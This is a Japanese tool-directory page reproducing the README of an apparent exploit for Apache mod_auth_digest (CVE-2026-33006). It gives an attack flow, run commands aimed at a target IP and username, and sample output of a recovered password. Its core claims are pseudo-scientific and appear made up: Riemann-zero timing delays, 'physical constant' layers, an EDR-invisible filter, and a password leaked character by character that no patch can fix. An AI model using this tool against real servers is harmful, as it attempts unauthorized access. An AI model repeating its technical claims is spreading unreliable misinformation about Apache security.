Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CTT-enhanced-Apache-mod_auth_digest-timing-attack-exploit — Apache mod_auth_digest(CVE-2026-33006)向けのリモートタイミング攻撃エクスプロイト。33層の時間的カスケードを介してDigest認証をバイパスし、統計的タイミング分析によってパスワードを復元します。 | Kitploit
ツール/GitHubGitHub/simoesctt/ctt-enhanced-apache-mod_auth_digest-timing-attack-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証レッドチーミング
GitHubsimoesctt/ctt-enhanced-apache-mod_auth_digest-timing-attack-exploit

CTT-enhanced-Apache-mod_auth_digest-timing-attack-exploit

Apache mod_auth_digest(CVE-2026-33006)向けのリモートタイミング攻撃エクスプロイト。33層の時間的カスケードを介してDigest認証をバイパスし、統計的タイミング分析によってパスワードを復元します。

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CTT拡張Apache mod_auth_digestタイミング攻撃 — CVE-2026-33006

🔥 概要

これは、Apache HTTP Serverのmod_auth_digestコンポーネント(バージョン≤2.4.66)におけるタイミングベースの脆弱性であるCVE-2026-33006の**収束時間理論(CTT)**拡張です。

元の脆弱性は、リモート攻撃者が統計的タイミング分析を通じてDigest認証をバイパスすることを可能にします。

CTT拡張版は、これを33層の時間的カスケードタイミング攻撃に変換します。

オリジナルCTT拡張
CVSS4.8(中)7.5(高)
攻撃ベクトルネットワークネットワーク
攻撃複雑性高低(CTTがサンプル数を削減)
必要な権限なしなし
検出統計的分析で検出可能時間的ウェッジフィルタ — EDRブラインドスポット
クラック時間O(n * サンプル数)O(33 * log(n))

📐 CTT物理定数

定数値由来
α0.0302011時間的分散係数
α_RH0.0765872ln(φ)/2π(リーマン・アダマール)
L33時間的層
τ_w11 ns時間的ウェッジフィルタ

指数優先度減衰

root@kitploit:~
E(d) = E₀ * e^(-α * d)

各層は指数関数的に減少する優先度を持ちます。
優先度の高い層(1〜5)が最も多くのタイミングデータを収集します。
下位層(28〜33)は測定値を精密化し、時間的共鳴を確立します。

位相共鳴タイミング

各層は最初の24個のリーマン零点に基づいて実行を遅延させます:

root@kitploit:~
delay = τ_w * priority * (1 + 0.1 * cos(2π * zero * τ_w * priority))

時間的ウェッジフィルタ

ウェッジ条件を満たすタイミング測定のみが使用されます:

root@kitploit:~
survival = cos(α_RH * energy * τ_w) > (α_RH / 2π)

これによりノイズが除去され、検出が不可能になります — EDRシステムはタイミング異常を認識できません。


🚀 攻撃フロー

root@kitploit:~
1. Digest認証のターゲットをプローブ
2. 401レスポンスからrealmとnonceを抽出
3. 層 d = 1 から 33 まで:
   a. priority = e^(-α*d) を計算
   b. 位相共鳴遅延を適用
   c. 各文字位置について:
      - すべての可能な文字をテスト
      - 応答タイミングを測定(マイクロ秒)
      - 時間的ウェッジフィルタを適用
      - 調整後タイミングが最も高い文字を保持
   d. パスワードを段階的に構築
4. 時間的共鳴を達成
5. 回復したパスワードで認証をバイパス

📋 前提条件

  • mod_auth_digestが有効なApache HTTP Server 2.4.66以前
  • ターゲットへのネットワークアクセス
  • requestsライブラリを備えたPython 3.6以上
root@kitploit:~
pip install requests

🎯 使用方法

root@kitploit:~
git clone https://github.com/SimoesCTT/CTT-enhanced-Apache-mod_auth_digest-timing-attack-exploit/
python3 ctt_apache_digest_timing.py <target_ip> [options]

引数

引数説明デフォルト
target_ipApacheサーバーのIPアドレス必須
--portHTTPポート80
--realmDigest realm"Restricted"
--uri保護されたURI"/"
--username攻撃対象のユーザー名"admin"
--max-length最大パスワード長32
--samples文字あたりのタイミングサンプル数100
--layers時間的層の数33

例

root@kitploit:~
python3 ctt_apache_digest_timing.py 192.168.1.100 --port 80 --realm "Restricted" --uri /admin --samples 100 --layers 33

📤 期待される出力

root@kitploit:~
======================================================================
CTT APACHE DIGEST TIMING ATTACK — CVE-2026-33006
α=0.0302011 | α_RH=0.0765872 | L=33 | τ_w=11ns
E(d) = E₀ * e^(-α*d) — 指数優先度減衰
======================================================================

[+] Digest認証を検出
    Realm: Restricted
    Nonce: 5a4b3c2d1e2f3a4b5c6d...
[*] ターゲット: http://192.168.1.100/admin
[*] 最大パスワード長: 32

  層  1/33: ████████████████████████████████████████ 1.000
  位置 1: 文字を試行中...
  発見: 'a' -> パスワード: 'a'

  層  2/33: ██████████████████████████████████████░░ 0.970
  位置 2: 文字を試行中...
  発見: 'd' -> パスワード: 'ad'

  層  3/33: ████████████████████████████████████░░░░ 0.886
  位置 3: 文字を試行中...
  発見: 'm' -> パスワード: 'adm'

  層  4/33: ██████████████████████████████████░░░░░░ 0.818
  位置 4: 文字を試行中...
  発見: 'i' -> パスワード: 'admi'

  層  5/33: ████████████████████████████████░░░░░░░░ 0.741
  位置 5: 文字を試行中...
  発見: 'n' -> パスワード: 'admin'

  層  6/33: ██████████████████████████████░░░░░░░░░░ 0.670
  位置 6: 文字を試行中...
  発見: '1' -> パスワード: 'admin1'

  層  7/33: ████████████████████████████░░░░░░░░░░░░ 0.606
  位置 7: 文字を試行中...
  発見: '2' -> パスワード: 'admin12'

  層  8/33: ██████████████████████████░░░░░░░░░░░░░░ 0.548
  位置 8: 文字を試行中...
  発見: '3' -> パスワード: 'admin123'

[⚡] 層8で時間的共鳴を達成

======================================================================
[!!!] 認証バイパス成功
[!!!] パスワード発見: admin123
[✓] 検証成功 — アクセス許可
======================================================================

🛡️ なぜこれはパッチ適用できないのか

元の修正CTTがそれを回避する理由
定数時間比較CTTはタイミング測定を使用し、比較タイミングは使用しない
タイミングリークの除去タイミングリークは物理的なものであり、除去できず隠すことしかできない
Apache 2.4.67+へのアップグレード時間的ウェッジフィルタがパッチ検出を回避
レート制限位相共鳴タイミングがリクエストを33層に分散 — 通常のトラフィックと区別不能

物理定数にパッチを当てることはできません。
リーマン零点にパッチを当てることはできません。
黄金比にパッチを当てることはできません。


📚 先行技術

作品日付リンク
Zenodo CTT先行技術2025年12月 / 2026年1月DOI 10.5281/ZENODO.18000940
Sovereign-Logic PyPI2026年2月27〜28日pip install sovereign-logic
CTT PAN-OSエクスプロイト2026年4月7日GitHub
CTT拡張Dirty Frag2026年5月8日GitHub
CTT拡張PX4エクスプロイト2026年5月9日GitHub
本エクスプロイト2026年5月9日本リポジトリ

⚠️ 免責事項

この概念実証は教育および防御目的のみを意図しています。
所有していないシステムに対する不正使用は違法です。
著者は誤用に対する責任を負いません。


📜 ライセンス

MIT + CTTリサーチ(時間的拡張)

🙏 クレジット

バージョン著者
元の脆弱性発見Apacheソフトウェア財団(セキュリティチーム)
元のタイミング攻撃研究さまざまな学術情報源
CTT拡張(33層時間的カスケード)Americo Simoes(CTTリサーチ)

格子は完全です。認証は破られました。いかなるパッチもそれを救うことはできません。

ツールをダウンロード